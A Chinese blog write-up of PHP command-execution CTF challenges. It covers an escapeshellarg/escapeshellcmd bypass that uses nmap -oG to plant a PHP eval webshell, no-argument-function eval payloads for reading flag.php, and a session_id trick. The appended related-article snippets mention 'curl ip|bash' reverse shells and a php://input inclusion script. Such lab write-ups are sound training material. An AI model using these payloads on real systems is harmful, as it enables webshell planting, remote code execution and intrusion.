命令执行类型CTF题目总结

最新推荐文章于 2025-11-01 18:13:02 发布
原创 最新推荐文章于 2025-11-01 18:13:02 发布 · 1.5k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文详细分析了一道PHP命令执行类型的CTF题目,涉及了escapeshellarg和escapeshellcmd函数的使用,以及如何通过nmap命令构造payload进行漏洞利用。在禁止套娃的环节,讨论了正则过滤的规避方法,如使用scandir、localeconv等函数读取文件,结合数组操作函数和文件读取函数尝试获取flag。

命令执行类型CTF题

php命令执行

buu Online Tool

一段php代码审计:
在这里插入图片描述
大致意思是获取x-forward-for头后与glzjin拼接创建文件夹,将传入参数host通过escapeshellargescapeshellcmd方法转义后,转到之前创建的文件夹目录,执行nmap命令。
如果两方法以上述顺序执行会有绕过漏洞

  1. 传入的参数是:172.17.0.2‘ -v -d a=1
  2. 经过escapeshellarg处理后变成了’172.17.0.2’’ ’ -v -d a=1’ ,即先对单引号转义,再用单引号将语句左右用单引号括起
  3. 经过escapeshellcmd处理后变成了’172.17.0.2’\’ ’ -v -d a=1’ ,这是因为escapeshellcmd对\ 以及最后那个不配对的引号进行了转义
  4. 最后执行的命令是 curl ’172.17.0.2’ \ \ ’ ’ -v -d a=1\ ’ ,由于中间的 \ \ 被解释为 \ 而不再是转义字符,所以后面的 ’ 没有被转义,与再后面的 ’ 配对成了一个空白连接符,所以可以简化成 curl 172.10.0.2\ -v -d a=1’ ,即向172.17.0.2\ -v -d a=1’ ,即向172.17.0.2\ 发起请求,POST数据为a=1 ’

经过两次转义后出现了问题,没有考虑到单引号。
虽然单引号可以逃逸,但执行cmd的连接符被转义过滤,能利用的只有nmap命令。
nmap命令中能执行-oG,将命令和结果写入文件,构造payload:

?host=’ <?php @eval($_POST['hack'])l;?> -oG hack.php ’

执行后会返回文件名,蚁剑连接找到flag

禁止套娃

进去后没有任何提示,buu也不能扫,只能手动试,除了.git是403,还有flag.php空页面.拿GitHack扫一下.git,能得到index.php的源码:

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

有三条正则过滤:

  1. 过滤掉data,php,filter,phar,目的是不允许伪协议读文件
  2. (?R)?:递归过滤括号内表达式(由内到外),只能以字母与下划线组合再拼接(),用空字符代替后与;作强比较(可以自己本地写正则试一下),目的是不允许命令执行含参
  3. 过滤掉绝对路径的目录
    既然要使用无参函数,可以用scandir(*)读当前目录:

scandir(*)    扫描当前目录
localeconv() 函数返回包含本地数字及货币格式的格式信息的数组
pos().current()返回数组第一个值

可以构造 exp=print_r(scandir(pos(localeconv())));读当前目录
在这里插入图片描述

//数组操作函数

  1. end() 数组指针指向最后一位
  2. next() 数组指针指向下一位
  3. array_reverse() 将数组颠倒
  4. array_rand() 随机返回数组的键名
  5. array_flip() 交换数组的键和值

//读文件函数

  1. file_get_content()
  2. readfile()
  3. highlight_file()
  4. show_source()

再利用数组操作函数读flag.php
payload1:?exp=show_source(next(array_reverse(scandir(pos(localeconv())))));
或者利用随机数撞出来(多刷几次):
paylaod2:?exp=show_source(array_rand(array_flip(scandir(pos(localeconv())))));

在这里插入图片描述
还可以利用session_id,将sessionID改成flag.php

session_start() 告诉PHP使用session;
session_id() 获取当前的session_id值;
手动设置cookie中PHPSESSID=flag.php;

再构造payload3:?exp=show_source(session_id(session_start()));
在这里插入图片描述

CTF命令执行题目解题思路
悦分享
08-02 1078
可以看到该文件有curl xx.x.x.x|bash字符,在linux下输入任意一个字符后加\是不会中断当前操作,可以继续输入内容。而后面没有\则会中断,而sh可以在报错的情况下依然会执行可以执行的命令,因此不会影响curl的执行。在自己服务器中放入bash一句话,利用curl ip|bash反弹shell。ls -t >g是倒序输出文件名字,然后sh _执行此文件,写入到g中。原理就是利用curl ip|bash等很多方式去反弹shell。利用linux下特有的命令来写入shell反弹。...
CTF web入门之命令执行 完整版
qq_41701460的博客
04-11 840
绕过思路:过滤了system,echo,这里可以使用passthru,但是这次还过滤了括号,所以passthru也没有办法用,这里使用文件包含,通过php://filter协议进行读取文件。可以使用使用空格绕过(%09) 也可也使用&拼接使用eval函数可以使用POST和GET其实一样的。**web36:**同web33 在前面的基础上,过滤了数字。.被过滤,则直接采用*,*表示多个字符,?**web33:**多了个双引号 和上面的题一样。**web30:**命令执行,需要严格的过滤。
CTF-命令执行部分总结
weixin_44770698的博客
05-29 2002
因为自己是小白,还是想着尽量快一点的学习到许多知识,最近又做了CTFshow里面的部分萌新题,这里总结一下其中的部分萌新WEB题。 web 9 要求我们使用GET方式传入c参数,参数中还要匹配到system或者exec等关键字,这里算是一个小坑,还以为是不能有这些关键字,还尝试了passthru、和拼接绕过......很尴尬。 这个比较简单我们使用system来执行查看config.php就可以了。 web 10 这个题的含义就是正则匹配到system、exec等,则会提示你cmd e
CTF命令执行部分总结
weixin_44770698的博客
12-19 901
CTF命令执行
CTF命令执行总结--初学者应该了解的
最新发布
2502_91116367的博客
11-01 1003
PHP命令与代码执行及文件查看摘要 命令执行函数 system()直接输出结果并返回最后一行;exec()需通过数组捕获完整输出;passthru()适合二进制数据;shell_exec()返回完整字符串;popen()通过文件指针处理流式命令;反引号与shell_exec()等效;proc_open提供更灵活的文件指针控制。 代码执行方式 eval()直接执行字符串代码;assert()可执行代码但PHP7.2后不推荐;preg_replace()的/e修饰符已废弃;create_function()易被
CTF命令执行知识点总结
SuperherRo的博客
08-28 307
echo "Y2F0IGZs YWcucGhwCg==" | base64 -d|bash # 解码为cat flag.php并执行。# 分号隔开每条命令,整行命令按照从左到右的顺序执行,彼此之间互不影响,所有的命令都会执行。# 一般情况下想flag、php这种字符会被ban掉,这种时候就需要进行绕过了。| # 只执行后面那条命令。& #两条命令都会执行。&& # 两条命令都会执行。# 匹配单个任意字符。
CTF】buuctf web(一)——命令执行
m0_52923241的博客
07-26 3480
[ACTF2020 新生赛]Exec 抓包看看 得到信息:以post方式通过变量target传参
ctf命令执行小结
舞动的獾
10-04 4726
1.相关函数 eval函数eval函数能够将字符串当作命令去执行 需要被执行的字符串 代码不能包含打开/关闭 PHP tags。比如, ‘echo “Hi!”;’ 不能这样传入: ‘<?php echo "Hi!"; ?>’。但仍然可以用合适的 PHP tag 来离开、重新进入 PHP 模式。比如 ‘echo “In PHP mode!”; ?>In HTML mode!<...
ctf xor题_一道使用异或来命令执行CTF题目
weixin_28944067的博客
01-26 2662
0x01 命令执行命令执行是通过各种绕过方式来达到执行命令的方式拿到flag,在CTF中有很多常见绕过的方式,比如过滤了什么 cat | read | ls | dir | head | tail 等读文件的敏感命令,但是这些的话还是有方法绕过的,比如说 cat 可以更改为 tac 那么就会倒读进行读取了。0x02 审计代码我们可以审计一下下面的代码来进行剖析一个绕过的方式,首先该代码进行判断了正...
CTF比赛最新题目答案
10-25
因此,在CTF比赛的环境中,如果题目提示使用su命令进行提权,可能是要求参赛者寻找系统中配置不当的用户权限。 在解决此类题目时,参赛者需要具备基础的Linux系统知识,熟悉文件系统的目录结构,了解如何在终端中...
CTF】利用dockerfile复现CTF题目
网络空间安全|人工智能|计算机科学
10-22 811
(最后的点不能丢)
ctfshow---命令执行
fainpo的博客
03-20 1860
就是让标准输出重定向到/dev/null中(丢弃标准输出),然后错误输出由于重用了标准输出的描述符,所以错误输出也被定向到了/dev/null中,错误输出同样也被丢弃了。data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么作用。$((~$(( $((~$(())))+$((~$(())))+$((~$(()))) )))) 这个是2。
CTF知识集-命令执行
星河梦瑾的博客
12-17 1402
includePATHAlinux的shell如果过滤空格,可以截取环境,例如执行命令env,会出现一堆命令。
CTF-命令执行
Luodehahajiang的博客
07-03 2628
ctf 命令执行 命令执行函数 命令执行绕过方法
gmailc2:一款基于Google SMTP的完全无法检测的C2服务器
qq_53058639的博客
07-24 1668
1、持久化;2、支持Shell访问;3、查看系统信息;4、…
命令执行题目加理解
zbbjya的博客
03-21 1046
听课笔记ctfshow的理解29 上图中我们会看到有一个preg_match 的函数进行正则表达式的匹配,成功返回1,否则返回0 要有分号不然出不来 phpinfo();使用时后要加分号 分号可以用?>代替 主要作用用法可以看这 https://blog.youkuaiyun.com/lituxiu/article/details/89330431?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164783517216781683952973%
CTF-WEB篇 攻防世界题目实战解析command_execution
2301_76565920的博客
04-21 1684
command_execution (命令执行) 难度:2。Linux命令的使用,利用ping命令执行漏洞。(类比与sql注入)
指令执行过程(习题)
weixin_43638873的博客
09-05 2445
按照题目中的说法,不采用Cache也不用指令预取,那么当运行到这条指令时,指令尚未取出,并且只能从内存中取。 机器周期一般以内存读取一条指令字的最短时间来定义,而且是可以变长的。 计算机中的取指过程: 转移指令的指令周期: 在取指过程中,MAR(地址寄存器)相当于半路上的中转站 (***第二次对于PC的修改在无条件跳转指令中必定会发生,而在有条件跳转指令中则未必发生,因此题目要强调“无条件跳转指令”***) 取指操作是由控制器自动进行的,如果控制器...
基础题目五:命令执行
king丶
07-31 1482
基础题目五:命令执行 发现过滤 cat | &符没过滤 127.0.0.1& 能执行 127.0.0.1&cat ../key.php 发现还是不行。 那就是过滤了cat 使用\ 127.0.0.1&c\at ../key.php 还是不行,过滤了key 使用通配符 127.0.0.1&c\at ../ke* 通配符 通配符是一种特殊语句,主要有星号(*)和问号(?),用来模糊搜索文件。当查
ctf题目关于文件包含类型
01-20
### CTF 文件包含类型题目解题思路 #### PHP本地文件包含漏洞概述 在CTF竞赛中,PHP本地文件包含(Local File Inclusion, LFI)是一种常见的Web安全漏洞。当应用程序允许用户输入控制`include()`、`require()`等函数所加载的文件路径时,攻击者可以通过精心构造请求来读取服务器上的任意文件或执行恶意代码[^1]。 #### 解题方法分析 对于存在LFI漏洞的应用程序,通常会提供一个可控参数用于指定要包含的文件名。例如,在给定案例中的两个GET参数之一`page`即被用来动态载入页面内容并最终由`include`语句处理。这意味着如果能够操控这个变量,则可以尝试访问敏感资源甚至远程命令执行环境。 为了成功解决此类挑战: - **理解工作流程**:熟悉目标站点的工作机制以及如何传递数据到后台脚本。 - **探索潜在入口点**:识别哪些地方可能接受外部输入作为文件路径的一部分。 - **测试不同payloads**:基于已知的知识库构建有效的注入字符串,比如利用特殊字符绕过过滤器或者采用特定于操作系统的绝对/相对路径表达方式。 - **验证响应行为**:仔细观察返回的信息以判断是否存在异常情况表明成功的渗透活动。 具体来说,针对提供的参考资料提到的情况,一种可行的技术路线涉及使用PHP伪协议(`php://`)配合HTTP POST请求体发送自定义PHP代码片段至服务端进行即时解释运行[^2]。 ```python import requests url = "http://example.com/vulnerable_page.php" data = "<?php echo file_get_contents('/flag_location'); ?>" params = {'page': 'php://input'} response = requests.post(url, data=data, params=params) print(response.text) ``` 此段Python代码展示了怎样模拟向含有未修复缺陷的服务发起POST请求的过程,其中携带了一个简单的PHP指令去获取假设存储着FLAG的位置的内容,并将其回显出来供参赛选手捕获。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值